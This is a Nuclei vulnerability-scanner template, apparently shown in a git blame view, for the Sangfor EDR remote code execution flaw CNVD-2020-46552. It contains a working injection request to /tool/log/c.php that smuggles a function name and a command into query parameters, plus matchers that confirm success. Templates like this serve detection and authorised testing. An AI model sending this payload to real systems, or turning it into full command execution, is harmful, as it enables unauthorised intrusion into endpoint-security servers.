nuclei-templates/cnvd/2020/CNVD-2020-46552.yaml

33 lines
1.1 KiB
YAML
Raw Normal View History

2022-05-14 11:05:15 +00:00
id: CNVD-2020-46552
2022-05-14 11:05:15 +00:00
info:
name: Sangfor EDR - Remote Code Execution
2022-05-14 11:05:15 +00:00
author: ritikchaddha
severity: critical
description: Sangfor Endpoint Monitoring and Response Platform (EDR) contains a remote code execution vulnerability. An attacker could exploit this vulnerability by constructing an HTTP request which could execute arbitrary commands on the target host.
2022-05-14 11:05:15 +00:00
reference:
- https://www.modb.pro/db/144475
- https://blog.csdn.net/bigblue00/article/details/108434009
- https://cn-sec.com/archives/721509.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
2022-05-14 11:05:15 +00:00
tags: cnvd,cnvd2020,sangfor,rce
requests:
- method: GET
path:
- "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php"
2022-05-14 16:53:47 +00:00
2022-05-14 11:05:15 +00:00
matchers:
2022-05-14 16:51:49 +00:00
- type: dsl
dsl:
- 'contains(body, "$show_input = function($info)")'
- 'contains(body, "$strip_slashes($host)")'
2022-05-15 10:52:18 +00:00
- 'contains(body, "Log Helper")'
2022-05-14 16:51:49 +00:00
- 'status_code == 200'
condition: and
# Enhanced by mp on 2022/05/18